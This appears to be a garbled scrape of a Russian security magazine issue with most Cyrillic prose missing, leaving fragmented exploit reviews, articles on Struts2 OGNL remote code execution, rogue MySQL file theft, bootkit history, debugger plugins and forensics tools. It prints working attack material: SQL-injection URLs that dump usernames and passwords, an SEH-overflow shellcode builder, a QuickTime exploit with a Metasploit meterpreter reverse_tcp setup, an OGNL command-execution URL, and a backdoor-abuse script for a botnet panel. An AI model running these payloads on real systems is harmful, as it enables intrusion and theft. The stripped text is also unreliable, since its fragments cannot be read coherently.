https://<host>/spywall/blocked.php?id=1&history=-2&u=%27/%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E
2. , (Test Ping), , (\`). apache.
/spywall/nameConfig.php /spywall/networkConfig.php.
3. /etc/sudoers apache admin
. , apache , chmod, chown insmod, .
4. SQL- ,
:

https://<host>/spywall/feedback_report.php?variable[]=1) UNION SELECT 1,2,3,4,username,6,7,8,9,password FROM users --&operator[]=notequal&operand[]=x
https://<host>/spywall/edit_alert.php?alertid=11%20UNION%20SELECT%201,2,username,password,5,6,7,8,9,10,111,12,13,14,15,16,17,18%20FROM%20users%20--%20

Symantec Web Gateway

Symantec Web Gateway

SOLUTION
5. CSRF LDAP- :

POST /spywall/ldapConfig.php HTTP/1.1
Host: <host>
Cookie: PHPSESSID=<valid-cookie>
Content-Type: application/x-www-form-urlencoded
Content-Length: 247

posttime=9999999999&saveForm=Save&useldap=1&ldap_host=0.0.0.0&ldap_port=389&auth_method=Simple&search_base=dc%3Dtest%2Cdc%3Dlocal&ldap_user=test&ldap_password=test&dept_type=dept&user_attribute=sAMAccountName&user_attribute_other=&ldap_timeout=168
CSRF- posttime,
unix timestamp.
, . , 9999999999, .
, :
1. , Symantec Web Gateway,
, , iframe.
(, EICAR-)
(XSS).
2. Symantec Web Gateway blocked.php. history=-2 ( ), /
(XSS) (Blocked Feedback) .
3. , . ,
, .
4. apache chmod chown
, SUID-.
5. () .
, . ,
XSS- . ,
,
.

TARGETS
Symantec Web Gateway <= 5.1.0.*.

AUDIOCOVER 0.8.22
CVSSv2:
:
:
CVE:

N/A
1 2013
metacom, onying
N/A

1 2013 0.8.18,
M3U. , lst 0.8.22 .
-, , .

EXPLOIT
:

# X -,
shellcode = "\x89\xe0..." +
file = "fuzz.lst"
head = "http://"
junk = "\x90" * 765

c msfpayload
X
#
#
# ,
# EIP
# 6
# ... RETN libiconv-2.dll

nseh = "\xEB\x06\x90\x90"
seh = "\xEE\x04\x01\x66"
nops = "\x90" * 80
textfile = open(file , 'w')
textfile.write(head + junk + nseh + seh + nops + shellcode)
textfile.close()

TARGETS
AudioCover 0.8.22 .

SOLUTION
.


APPLE QUICKTIME 7
CVSSv2:
:
:
CVE:

7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
24 2013
Tom Gallagher, Paul Bates
2013-1017



Apple QuickTime.
.
MOV.
- , rdrf dref, Alis.
, ,
, -
. .
.

EXPLOIT
, :

mov = "\x00\x00\x06\xDF"
mov << "moov"                  # moov
mov << "\x00\x00\x06\xD7"      # (1751d)
mov << "rmra"                  # moov
mov << "\x00\x00\x06\xCF"      # (1743d)
mov << "rmda"                  # rmda
mov << "\x00\x00\x06\xBF"      # (1727d)
mov << "rdrf"
mov << "\x00\x00\x00\x00"      # 0
mov << "alis"                  # : FS alis
mov << "\x00\x00\x06\xAA"      # (1706d)
mov << rand_text_alpha(8)
mov << "\x00\x00\x06\x61"      # (1633d)
mov << rand_text_alpha(38)
mov << "\x12"
mov << rand_text_alpha(81)
mov << "\xFF\xFF"
mov << rand_text_alpha(18)
mov << "\x00\x08"              # (8d)
mov << rand_text_alpha(8)
mov << "\x00\x00"
mov << "\x00\x08"              # (8d)
mov << rand_text_alpha(8)
mov << "\x00\x00"
mov << "\x00\x26"              # (38d)
mov << rand_text_alpha(38)
mov << "\x00\x0F\x00\x0E"
mov << "AA"
mov << rand_text_alpha(12)
mov << "\x00\x12\x00\x21"
mov << rand_text_alpha(36)
mov << "\x00"
mov << "\x0F\x33"
mov << rand_text_alpha(17)
mov << "\x02\xF4"              # (756h)
mov << rand_text_alpha(756)
mov << "\xFF\xFF\x00\x00\x00"
mov << buf

QuickTime
Apple (bit.ly/13CSNW0).
HTML-
Metasploit-:



Carberp


msf > use exploit/windows/browser/apple_quicktime_rdrf.rb
msf exploit(apple_quicktime_rdrf.rb) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(apple_quicktime_rdrf.rb) > set 192.168.24.141
msf exploit(apple_quicktime_rdrf.rb) > exploit

TARGETS
QuickTime 7.7.3 .

SOLUTION
.


CARBERP WEB PANEL C2
CVSSv2:
:
:
CVE:

N/A
28 2013
Xylitol
N/A

. Zeus,
Carberp
- . Xylitol :

if(@$_POST['id'] == 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV'){
    //Rkey end
    if(!empty($_POST['data'])) eval(pack("H*", base64_decode($_POST['data'])));
    exit;
}
, POST-
BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV id, , Base64
data.

EXPLOIT
:
(bit.ly/18NBXeL).
,
.
Metasploit-.
, POST-. , PHP
:

// ,
// Base64
$data = array(
'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
'data' => '...');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$contents = curl_exec($ch);

TARGETS
, 28 . , :).

SOLUTION
. BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV .




1-DAY VS 0-DAY,

STRUTS2

whitehat, security, ZeroNights
.
Principal Security Engineer
Nokia,
HERE.

16
Apache Foundation
advisory Struts2. ,
, ONGL- ( Struts2), , , . ,
.
ONGL:
struts.apache.org/release/2.3.x/docs/s2-016.html. , ID ( ):

http://host/path/blah-blah.action?redirect:${('#zlo%5C75@java.lang.Runtime@getRuntime().exec("id")')(e)}
, ${ .. }, ONGL-.
:

, . , , ,
, .
http://host/path/blah-blah.action?redirect:${31338-1}

http://host/path/31337
, ONGL- (
). ,
. , Struts , ,
,
, .
, .

1-DAY OR 0-DAY
, , 0-, , , . , ,
.
,

, RCE.

16- ( , - ). , -
(kuxoo.com/archives/260).
-, ,

. .
1-... ,
? ,
. ,
Struts2. QA... , , ,
CERT, ... ,
struts.apache.org . Who cares?


-,
, , , . , , ... .
, ,
PCI DSS,
!
17- ... . , 24 ,
, ... , ,
. , ... .
, ,
(
26- ,


, Apple :)

)! , , . , CISO, , ,
, ... ,
( , ,
, , , ). , HIDS, ... (, 25- ,
).
, , ,
? QIWI. ,
Struts2. 18- .
, ,
, IP . QIWI. QIWI ,
, ,
- .
QIWI , . ,
1617 .
18
IP- .

( ) - , .
, CERT 22 , ... -
. , developer.apple.com. Struts2
... - .
Apple, ,
OVH.
com ( ).
- email VPN... Struts2, ! , ,
- ... ,
: , ,
. ,
, , IT
Security, .

...

QIWI , , :).


shell- Apple.

, - , ,
, , . , -.
,
.
- . , :
Sony Entertainment
Network Struts2, Apple expresslane.apple.com.
( )
.
, ( 1819- ). , ,
POST. ,
.
Sony, Apple
;
, ,

, WaF IPS,
.


. ,
, PCI
DSS ISO, CISO . ,
, !
, , , . ,
(,

, ). , ,
,
, security/response-
.
CISO- , , .
: , , , , , ,
, :).

,
- ...

Shell- Sony.
, -
.

WARNING


. ,

,
.


WARNING


. ,

,
.


@GiftsUngiven


@cyberpunkych


@dsbaranov


@ygoltsev



.
,

0-day-
SQL- LOAD DATA LOCAL INFILE
.


, -.
. :
, MySQL- , ,
. , MySQL- .
:
, , rdot.

MySQL
. . - , ,
, , ,
! ?


2. , ,
.
3. .
, ?
, 3. , .
, .
MySQL-
#2,
, !
? !

!

rogue_
#1

org (bit.ly/14rYQA9). : ,
,
?
! LOAD DATA
LOCAL,
. , . ,
,
, .
LOAD DATA
LOCAL INFILE, .

, rdot.org (bit.ly/yqUzYw). , , select .
, . ,
.
. , LOAD
DATA LOCAL - .
: ,
,

. , - , , ,

- . .
! ,
SQL- ? :)

Python,
MySQL-, .
?

LOAD DATA LOCAL #2

:
, .
. LOAD DATA LOCAL
INFILE . IP , :
1. , LOAD DATA LOCAL INFILE "C:\\
Windows\\system32\\drivers\\etc\\hosts" INTO
TABLE mysql.test.

#3



INTERCEPTER-NG
,
MySQL
MITM-
.
, LOAD DATA LOCAL,
:). Ares, Intercepter
(intercepter.nerf.ru),


.
.
,
,
.

, LOAD DATA LOCAL

mysql. ,
MySQL ( ,
) . :
1. SELECT * FROM
mysql.user (1).
2. : -
c:/boot.ini (2).
3. ? , (3).
Python,
MySQL-, (
boot.ini). ?

IN THE WILD
: python rogue_mysql.py. .
? ,
phpMyAdmin
MySQL.
. :

<?php
$conn = mysql_connect($_GET['mysql_host_port'], 'root', '12345');
mysql_query('SELECT * FROM mysql.user');
?>

boot.ini

:
honeypot,
/.
. , rogue_mysql.py,

hosts, , :).


, , (
?), MySQL- , LOAD DATA
LOCAL. (
,
GUI- Mac, MySQL-, Ubuntu;
, PT .
. ).
, , ,
, Server
Greeting. .

Intercepter-NG


, LOAD DATA
LOCAL , , ,

.
,
,
. ,
,
MySQL
LOAD DATA LOCAL,
. .
, .
, .
,
. , : !
!


,

coffein.h@gmail.com





Cuckoo Sandbox


,
.


. ,

Cuckoo Sandbox
.

, . , Windows
Vista Windows 7, OS X. (-) GNU/Linux.
, , Cuckoo Sandbox :
Win32 API , ;
, , , ;
;
PCAP;
, ;
;
VirusTotal (virustotal.com).

Cuckoo Sandbox Python .



: KVM, VirtualBox, VMware.
Microsoft Windows XP SP3. ,
, -


Windows (*.dll), PDF Microsoft Office, URL- PHP-.
,

.

Cuckoo Sandbox ( ).
, , () .
,
.
. , , :
( , );
;
.

. 1.


. 2.

. 3. HTML

, Python: MarkupSafe-0.18,
setuptools-0.9.6. , (-) GNU/Linux. Windows. , ,
Windows XP SP3.
( ),
. .
, Cuckoo Sandbox Book (bit.ly/14w9oky) (- cuckoo\docs\book),
,
Linux. .
Cuckoo Sandbox
Cuckoo\conf\. cuckoo.conf . IP- , cuckoo. ,
tcpdump.exe, , . , .
( Windows) tcpdump D.
processing.conf .
, . reporting.conf ,
.

Cuckoo Sandbox :
Python (2.7);
SQLAlchemy (0.7.10);
;
(KVM, VirtualBox VMware);
tcpdump .
, :
Dpkt ( ): ;
Jinja2 ( ): HTML-;
Magic (): ;
Pydeep (): ;
Pymongo (): ,
MongoDB ;
Yara Yara Python (): Yara ( svn-);
Libvirt ():
KVM;
Bottlepy (): web.py
api.py ( utils, );
Pefile ():
PE32;
Python Image Library ():
( ), .

WINDOWS

, , ,

, , .


Magic pyd
pydeep.
Magic
Cuckoo Sandbox
.


(bit.ly/ra2fR0).

,

.



( ). .

python-magic

: bit.ly/19II1ES.
,

C:\Windows\System32

: magic1.dll, zlib1.dll, regex2.dll.
.
pydeep, ssdeep (
ssdeep-2.9-0.3),
fuzzy- ( ).
. ,
, ,
. , ssdeep
. . , Windows
Python 2.7 ( ),
GCC (MinGW) Cython.
Python , MinGW
Cython. Cython
, -



,
,

. 4.



,
, .
.
.
IP-(), ()
. .
,
(
) ( Windows).
,
, .
, ( ).
(bit.ly/13H7Opy).
<machinemanager>.conf,
,
,
, IP- .
. cuckoo.py, -

MinGW. ,

, PATH
c:\mingw\bin.
.
Python,
MinGW.
Python27\Lib\distutils\. distutils.cfg (
) :

[build]
compiler = mingw32

cygwinccompiler.py,
. self.set_executables(...)

cuckoo.
. 1. ,
, , .


Cuckoo,
-, web.py,
cuckoo\utils.
http://127.0.0.1:8080.
, .
.

: bit.ly/16uw9TR bit.ly/12Upeo7.
,
(. 2).
, .
-, submit.py cuckoo\utils.
-. (. 4).
.
cuckoo\storage\analyses\ (. 5).

CygwinCCompiler (UnixCCompiler)
Mingw32CCompiler (CygwinCCompiler),
Cython.
.
, ssdeep.
.
setup.py
(ssdeep) Windows
./configure && make. ,
.
, , Cygwin. Cygwin

make. Cygwin setup.py (ssdeep):
class BuildExtension(build_ext.
build_ext)

(cd ssdeep && ./configure && make)

(cd ssdeep && sh configure && make),


Cygwin ./.
Cygwin,
ssdeep-2.9-0.3\ssdeep\

sh configure && make



Windows
setup.py install (ssdeep).
,
,
ssdeep .


,
Cuckoo Sandbox. , , ,
, .



:
1.
.
2. .
3. .
4. () .
5. .


,
. : ( )
.
( )
. (system-host). (system-host)
. ,
- .

. 7.


, , :
1. () .
2. , .
3. .
. ICMP API IcmpSendEcho.
API- ip_option_
information ( IP-), icmp_echo_reply, ICMP- (
).
:

var
SearchRec: TSearchRec;
begin
if (FindFirst('\\'+IP- (+'\'+
(+'\*.*', faAnyFile, SearchRec) = 0) then
begin
repeat
// ,
//
//
// ,
if not ( ( SearchRec.name = '.' ) or
( SearchRec.name = '..' ) ) then
begin
ForceDirectories(PChar('[ /
]'+'\'+[] +'\'+ 'ip- '));
CopyFile(PChar('\\'+IP- (+'\'+
(' +SearchRec.name), PChar([ /
]'+'\'+[] +'\'+
'IP- + '\'+SearchRec.name),true);
end;
until (FindNext(SearchRec)<>0);
FindClose(SearchRec);


, .
, , -, .

, , .
,
. :
( ), (, systemhost, SpyEye),
(jar_*.tmp, xkjhaqw*, 0.* );
(*.exe, *.dll, *.class, *.jar/*.jad, *.pdf );
.

, ,
. .
:
1. .
2. : .
3. , , , .
1.

, . , ,
, , Local Settings, Temp, Sun\Java\Deployment\cache\6.0\*, Startup .
. .

:
, ,
: <done>_< >.<id
>;
( ).

. 5.

. 6. ,

end;


DVD

,
,
.

. 7.

. .

:

if ( Pos(filename,SearchRec.name) > 0) then


begin
if (Copy(SearchRec.name, 1,5) = 'done_')then
begin
result:=true;
exit;
end;
...
else
result:=false;
...
, submit.py, .

function sendFileCuckoo(path, filename:string):integer;


var
exp:string;
begin
...
if exp = 'exe' then
testFile('--package '+exp+' '+path+filename);
if exp = 'doc' then
testFile('--package '+exp+' '+path+filename);
if exp = 'dll' then
testFile('--package '+exp+' '+path+filename);
if exp = 'pdf' then
testFile('--package '+exp+' '+path+filename);
...
end;

submit.py:

function testFile(param:string):integer;
begin
  CreateProcess(nil, PChar('python D:\cuckoo\utils\submit.py '+param), nil, nil, True, CREATE_NEW_CONSOLE, nil, nil, startupinfo, processinformation);
  ...
end;
,

.
, - , ,
,
, .
- REST API, REST-.
, API-
(JSON) Cuckoo Sandbox, , .
: bit.ly/1c3VoBz.
-, .


,
.
, , . .


Blackhole
exploit kit


@c3retc3, cload.ru


-
, , ,
. - Blackhole
exploit kit v2.0.1 :
. , , - (blackbox-,
- ).
, : . ,
- ( )
Blackhole exploit
kit
, -
.

BLACKHOLE?

. -

, ,
:
1. URL.
.
2.
.
3. captcha ( ).
4. Memcached

5.

6.

7.

8.

.
Windows 8 ,
.

.
URL .

.

(
, ,

13 000 IP, Tor-
).

:
(XSS)

. 1. - Blackhole exploit kit

(Cross Site Scripting aka


XSS) -,

( , ?).
( , registers.php)

. -
.


. 2. FileUrl JS-

registers.php - FileUrl (
) Title ( ).
, HTML/JS- ,
(. 2).
- XSS.

HTML-
JS-.
HTML5

-. ,
- Geolocation API (. 4).

: SESSION FIXATION
Blackhole exploit kit

ookie - type sort, -


. 3. HTML- ( <img> )
XSS

registers.php. . 6 ,
type registers.php Fake_Cookie.

. : +desc. ,
.

, , .

session fixation,
(, , cookie).
,
, ()
Logout. , -

,
.

:

- , -
.
- ,
CSRF UI redressing (aka Clickjacking).
(
, ).

:
.
Blackhole exploit kit -. ,
(-. . .)
(! . .)
.

. 4. HTML5 Geolocation API


XSS-

. 5.

Title
( )

. 6. Fake_Cookie sort



, ,
,
. , ,
,
, , ,

.

,


.


,
?
.
,
. , , . ,
, . , .
, , ,
. ,
. , , . .
, , , .


,
. , , TrueCrypt, BitLocker PGP Disk.
, ,
Elcomsoft Forensic Disk Decryptor.
, , .

,
,
Belkasoft Research
contact@belkasoft.com

,
; , ; ,

, .
. -
- ,
. , , ,
, .

, .




.
.
: USB-,
, Live RAM Capturer
(ru.belkasoft.com/ru/memory-dump)
Belkasoft, .

. , -


,
,
.
, ,
, ,

(, Karos).
,


.


.
, .
,
, ,
,
.


CaptureGUARD Gateway,
WindowsSCOPE

Belkasoft Live RAM Capturer (-,
, ...).
, . 32- 64-
, , .
( )
( ) , .

.
:
?
.
Live RAM Capturer ,
. ru.belkasoft.com/ru/memory-dump.



Belkasoft Live RAM
Capturer

,
.
, ,
? ,
.

.

IEEE 1394,
FireWire i.LINK. FireWire

DMA. ?
, .
, ,

,
FireWire.

( ,
Inception pyfw, Python, ; , ),

.
. , Linux OS X
Inception (bit.ly/yz09Ff).
, FireWire?

-. , . ,
PCMCIA, CardBus ExpressCard,
. , USB, .
,
,
iPhone, bit.ly/60FDdS.
FireWire? , :
FireWire
, . OS X
, FireWire, .
Windows : FireWire
; , Windows 8 .

. ,
. ,
( )
. .

.


?

. ? , ,
.

, ,
, , ,
, ,
.

, . ,
. - ,
. , , .

, (,
, . ,
). , , ,
.

Belkasoft Evidence
Center


,
, , () .
:
, ( Chrome).
:

. ,
( ) .
- ,
. .
, :
, .
, JPEG
JFIF. ,
. , , , .
.

? ,
,
.
,
. , Windows
.

, .
, . .

, .
Belkasoft Evidence Center (belkasoft.com),
,
.
, . ,
,
.



Guidance EnCase

:
Elcomsoft Forensic Disk Decryptor (elcomsoft.com) , TrueCrypt, BitLocker PGP
Disk. ;
Passware Kit Forensic (passware.com) , TrueCrypt, BitLocker PGP Disk. FireWire-.
;
Belkasoft Evidence Center (belkasoft.com) ,
,
; ,
, . ;
Guidance EnCase (guidancesoftware.com)
, . -
, .
.


-
.


: , .

,
, ,
.

.
, (). ,

.
,
. : ,
, .


WWW
FireWire
:
bit.ly/EvKED,
bit.ly/60FDdS



?
, .
, .
.
? , ,
,
,

, .

VPN-. ,
- ,
.
,
(
). , .


-.
, . ?
(
, ,
- ),
,
, .
, .
. , , ACPO
(Association of Chief Police Officers) :
. ?
,
(,
).
.

.
,
.

Elcomsoft Forensic Disk


Decryptor

(
, , ).

.

,

. Android (bit.ly/Xa9XXN).

Android 4.0 .
,
, . ,
.
, ,
.

, .

Android :

fastboot;
, USB.
,
.

, ,
15 . . ,


. : ,
.
. FROST, : bit.ly/Xa9XXN.

.
.

:
. ? , ,
.

, ,






OllyDbg
32- (ring 3).
: , ,
,
,
.

500 ,
.

OLLYDUMPEX
: bit.ly/16Db6B1
: OllyDbg 1.10/2.01, ImmunityDbg 1.7/1.8, IDA Pro, WinDbg 6
, -,
,
,
. , .
. , -
, , . OllyDumpEx
:
OllyDbg 1/2, Immunity Debugger 1.7/1.8, IDA Pro, WinDbg. :
EXE-, DLL ;
MZ/PE- ;
PE32+;
64- ( IDA Pro);
( );
;
RVA DataDirectory ImageBase;
(RawSize, RawOffset,
VirtualOffset ).

OllyDumpEx


ser-storchak@mail.ru,
@ser_storchak,
ser-storchak.blogspot.ru


OLLYMIGRATE
: bit.ly/1btgT9i
: OllyDbg 1.10/2.01, ImmunityDbg 1.7/1.8, IDA Pro, WinDbg 6
, ,
.
, ,
.
OllyDbg, Immunity Debugger,
WinDbg IDA Pro. ? OllyMigrate Plugin
.
, . ,
OllyDbg OEP (Original Entry Point),
Immunity Debugger ,
Python-, Import Table.
, : OllyDbg 1/2, Immunity
Debugger 1.7/1.8, IDA Pro, WinDbg. :
;
.

DVD


, .

OLLYSOCKETTRACE


OllySocketTrace.

WWW

: bit.ly/1eCz9hO
: OllyDbg v1.10


OllyDbg:

, .
, ,
, .

: WSASocket, WSAAccept, WSAConnect, WSARecv,
WSARecvFrom,
WSASend,
WSASendTo,
WSAAsyncSelect,
WSAEventSelect, WSACloseEvent, listen, ioctlsocket, connect,
bind, accept, socket, closesocket, shutdown, recv, recvfrom, send
sendto.
, , . OllySocketTrace

, . ,
OllySocketTrace Log.

OpenRCE: OllyDbg
Plugins (bit.ly/h3M05d)
Tuts 4 You: OllyDbg
Archive (bit.ly/1eDJdr4)

Immunity Debugger

OLLYHEAPTRACE
: bit.ly/13ccnOf
: OllyDbg v1.10

. ,

,
,
.
(RtlAllocateHeap, RtlFreeHeap, RtlCreateHeap, RtlDestroyHeap, RtlReAllocateHeap, RtlSizeHeap, GetProcessHeap
and RtlInitializeCriticalSection, RtlDeleteCriticalSection) , .

:
;

;
.

?
Plugins.
,
/ . DLL-
,
:

OllyDBG v1.10: Options Appearance


Directories. Plugin path .
OllyDBG v2.01h: Options Options Directories.
Plugin directory .

Plugins.


INJECTHOOKLIB
PYLLOW
: bit.ly/19lNH8N
: OllyDbg v2.01


OllyDbg
. ,
,
,

,
.
,
.


:
Colours
ollydbg.ini.

[Colours]

.


: bit.ly/1cGR2zr.

Immunity Debugger?
, , IDA,
Python. ,
, .
OllyDbg , ( ODbgScript).
, Pablo Escobar OllyDbg,
Python, Pyllow.
, ,
OllyDbg API. , .
Visual Studio 2010,
Boost, Boost.Python 32-
Python 3.x ( 3.2). , , Boost Python,
. , /boostdir/tools/build/v2/user-config.jam :

: bit.ly/19X2GoR
: OllyDBG v1.10
, .
, (bit.ly/OjxUMj Windows XP, bit.ly/NZW6Ci Windows 7). , ,
DLL-,
.
,
(bit.ly/168kcF2),
.

, .

using python : 3.2 : "C:/Program Files (x86)/Python32/python.exe" # path to your Python setup
  : : : <address-model>32 # x86-32 only
  ;
. Boost.Python :

bjam --toolset=msvc-10.0 --build-type=complete --with-python python=3.2 address-model=32
- ,
Boost : bit.ly/14FU7xP.

user-mode

OLLYGRAPH
: bit.ly/19c55cs
: OllyDbg v2.01
, IDA Pro,
.
, ,
,
. ,
, . ,
OllyDbg, OllyGraph. -, ,
IDA Pro. , -

OllyFlow

wingraph32, . 1.10
OllyFlow (bit.ly/14lNtpb)
OllyGraph .


, , .
:
Command Bar (bit.ly/14GHQcr) Command Line. , .
PhantOm Plugin (bit.ly/qyNqJO) OllyDbg , . .
StrongOD (bit.ly/gzazAd).
PhantOm.
Olly Advanced (bit.ly/14GI0An). , , ,
OllyDbg .
ODBGScript (bit.ly/17Is2AM), ,
.
OllyDump (bit.ly/17Is4si) .


OLLYMSDN
: bit.ly/HABDmP
: OllyDbg v1.10, Immunity Debugger 1.7/1.8

MSDN

WinAPI ,
.
, /, . ,
, MSDN. online-?
- OllyMSDN. ,
WIN32.HLP (
API). ,
Olly. ,
, WinHelp() API
MSDN.
,
call Help on
symbolic name <Ctrl + F1>.

OLLYDBG PDK

,
,

,

.

PDK
Plugin Development Kit,


bit.ly/18oD7t6
.

UBERSTEALTH
: bit.ly/14AKk9r
: OllyDbg v2.01, IDA Pro
,
! ,
, .

IsDebuggerPresent .
. , .
Boost >=1.48.0, WTL (Windows Template Library) >=8.1, Windows
Driver Kit >= 7.0, DDKBuild. -,
WDK & DDK,
. , Visual Studio 2008.
, OllyDbg,
IDA Pro.

Uberstealth

DETACHME
: bit.ly/16EjhZJ
: OllyDbg v1.10
,
OllyDbg, Detach, ,
. , 1.10, ,
. , DetachMe,
OllyDbg
. , UDD-.

OLLYDBG-BACKUP
: bit.ly/15sKyhb
: OllyDbg v1.10 / v2.01
: ,
, .
UDD-. , . ,
ollydbg-backup, , CSV-,
.

OllyDbg ,

,

.
,



.
,
.

Ollydbg-backup.
CSV-


WARNING
! ! , !
D1g1 ,
Digital Security
@evdokimovds

X-TOOLS


:
hasherezade
URL: hshrzd.
wordpress.com/
pe-bear
: Win

: Jean-Philippe
Teissier
URL: github.com/
jipegit/OSXAuditor
: Mac

: David Zimmer
URL: github.com/
dzzie/VS_LIBEMU
: Win

PE-

FORENSICS TOOL MAC

PE- , must have .


-

.

PE-bear.
,
:
PE32, PE64;
;
(
);
(
RVA/File-);
;
PE-;
Explorer ( , :). . .) .

OS X Auditor
Python OS X .

,
.
:
;
;
;
;
;
.

Scdbg , libemu.
, ( ) .
,
-
, -, .
scdbg.
GUI , , windbg,
. : -, , , seh,
, DLL
. scdbg 199
API-, 12
DLL 224 .

ROP-- . .
scdbg ROP-,

advapi32.dll:

, ,
- .
malware-, .
PE
.
. , ,
,
.

, ( ,
Mac).
,
:
;

Safari, Firefox Chrome;
;
Wi-Fi-.
Team
Cymrus MHR, VirusTotal, Malware.lu .
HTML-.
Syslog-.
( ) Mac, :).

scdbg -f advapi_rop.sc -rop -raw 0x77dd1000-c:\advapi.text.dat -poke 0x77dd1404-0x7c90dc9e
scdbg

sandsprite.com/blogs.


POWERSHELL

, , ,
(Card
Numbers, CVV ). .
,
, , , brute force .
CC_Checker , .

: snarez
URL: github.com/
snarez/voltron
: Linux


BIN/IIN: 4329 95 | Bruteforce: XX XXXX | Last 4: 1234

PowerShell. :

CC_Checker.ps1 -i INPUT_FILE -o OUTPUT_FILE -h HASH_TYPE [1-3]

: Karl Fosaaen
URL: netspi.github.io/
PS_CC_Checker
: Win

1 = SHA-1, 2 = SHA-256, 3 = MD5.


:

123456??????1234:HASH

: Bryan Alexander
URL: github.com/
hatRiot/zarp
: Linux

: kenshoto
URL: visi.kenshoto.
com/viki/MainPage
: Win/Linux/
Mac/BSD/Solaris

GDB OLLY

OllyDbg
WinDbg Windows
, GDB *nix-.
.
GDB -

gdbinit fG!. voltron,
Python. , ,
Windows-,
.
: voltron server, view,
UI.
:
;
;
;
backtrace;
.

. Zarp
,

. , , ,

.

.
DoS-.
,

. ,
Zarp Python . :
Scapy ( );
airmon-ng suite (
);
tcpdump ();
paramiko (ssh2- Python);
nfqueue-bindings.

, , . <F8>
, SoftICE , OllyDbg .
:
IDA IDAPython;
WinDbg PyKd;
ImmunityDbg, Python, .

,
tmuxinator,
.
view TerminalView. ,
GDB.
Voltron GDB v6, GDB v7
LLDB
x86 x86_64.

Zarp , :
;
DoS;
;
;
;
;
.

Python, . malware,
.
VDB,
vtrace invisig0th
kenshoto. DEF CON CTF:
,
.
VDB (, )
.
, , , .
,
.
-.
, Win32/Win64, . : Windows, Linux,
OS X, BSD, Solaris. ,
, , ,
. GUI Qt .


Malware


bradleypjohnson@flickr.com

][-:
,
2000 !

tregubenko_v_v@tut.by


90- . :,
.
! , .


IBM
PC, MS-DOS, Brain,
1986 . Brain
,
5- ,
.
, .
Brain ,
.

Brain.
, ,
. .
1987 -
,
MBR . Stoned,

: Your PC is now Stoned!
!. ,
(Legalise Marijuana). Stoned
90- . 512
( ). ,
.
13h ( BIOS),
. , , Brain Stoned,
,
,
. ,
Stoned Bootkit.

Vista
.

Mebroot ,
2007 . Mebroot

BootRoot.
Mebroot (version 0) ,
, , .
,
copy-paste (
) . , Mebroot
hi-tech-.
Mebroot Sinowal,
Sinowal (aka Torpig Anserin) 2005 , .

. Mebroot
Sinowal.
Mebroot
250 350 430
. 20 ,
20 . WinAPI, CreateFile \Device\


in the Wild o malware,

Windows, . -,
BootRoot ( Windows
2000/XP), Black
Hat USA 2005 (Derek Soeder)
(Ryan Permeh)
eEye Digital Security (eeye.com). - Vbootkit ( Vista RC1/
RC2) (Nitin Vipin
Kumar), NVlabs (nvlabs.in). Vbootkit
Black Hat Hack in the Box 2007 -

. 1. Mebroot

Harddisk0\DR0 (
\??\RealHardDiskN \??\PhysicalDriveN).
ring 3
( ring 0!) . , , Mebroot
version 1,
2008- , ,
disk.sys.
:
0 ;
60 ;
61 , ;
62 MBR 0;
(
650) .
Mebroot
(. . 1):
1. 2
0x7C00 0x0000.
2. 60 61
.
3. 13h
( 0x004D).
4. 0x7C00
MBR 62, .
5. 13h osloader ( ntldr)
.


6. osloader ( 60),
ntoskrnl.exe nt!IoInitSystem.
7. ntoskrnl.exe ( 61).
8. - ntoskrnl.exe
, .
Mebroot
,
,

. , NDIS
,
. ,
, disk.sys: IRP_MJ_READ
IRP_MJ_WRITE.

,
MBR.
(DGA Domain Generation
Algorithm).
, ,
Google.
.
,
DLL , (
services.exe). ,
%System% ,

, . DLL,
, HTML-
( iframe jscript) ( ), -
.
Mebroot ,
,
, .
, 2008
disk.sys,
(watchdog).
,
.
2009 Mebroot Windows Vista.


Mebroot
stoned-vienna.com
(Peter Kleissner), , ,
,
Stoned Bootkit, Black
Hat USA 2009. ,


-


.
Stoned Bootkit , ,
, , public lite
. , Stoned
Bootkit ,
. , ,
Whistler Bootkit. - Stoned v2 Alpha 3 20 2009
, 2010
. , C:\System
Volume Information NT-AUTHORITY\
SYSTEM.
2009
Hack In The Box Vbootkit
2.0, Windows
7 x64.

PatchGuard Driver Signing Policy,
,
.
GPL Vbootkit
Stoned Bootkit
,
-.
,
...
Stoned Bootkit,
stoned-vienna.com ,

malware. , ,
Mebroot
Ghost
Shadow, Microsoft
Ghodow. , Symantec 2010 , Trojan.Mebratix.B. -

Mebroot,
. ,
MBR Mebratix ,
mov, 00D0h
,

,
,
Mebratix. 59 (
) .
,

XOR,

.
17 .
explorer.exe
IRP- IRP_MJ_READ/
IRP_MJ_WRITE Disk.sys.
,
, .


hi-tech-
TDL,
TDL4 (aka Tidserv Olmarik ESET
?).
TDL: ,

(
, -, ...). ,
TDL
Tyler Durden, TDL Tyler Durden Loader (
Trojan
DownLoader ). , Tyler Durden
Comodo. ,
TDL3 Esage Lab TDL3
Dogma Million (bit.
ly/16P4jSu), ,
, , -

[Figure labels: bootmanager, jmp, jump-to-kernel-loader, kernel-loader, jump-to-kernel, Kernel]

. 2. EvilCore


, 2010 . TDL4

, 65 .
, 2010- TDL4
0.01, 2010- TDL4 0.02 x64 ,
malware , in
the Wild. Stoned Bootkit
x64 2011 .
Mebroot ,
TDL
. -, ,
,
,

WinAPI, CreateFile(), WriteFile(),
ReadFile(). TDL4 ( 8 )
.
RC4
ldr16, ldr32, ldr64, , ,
. MBR ldr16. ldr16
.
TDL4 kdcom.dll ( Int
13h kdcom.
dll),
. kdcom.dll ldr32 ldr64
. ldr32 ldr64 ,
.
TDL4 0.03,
2010-,
Task Scheduler, MS10-092.
Windows XP , .


2011
,
BIOS 13h.
MS-DOS,
: , BIOS
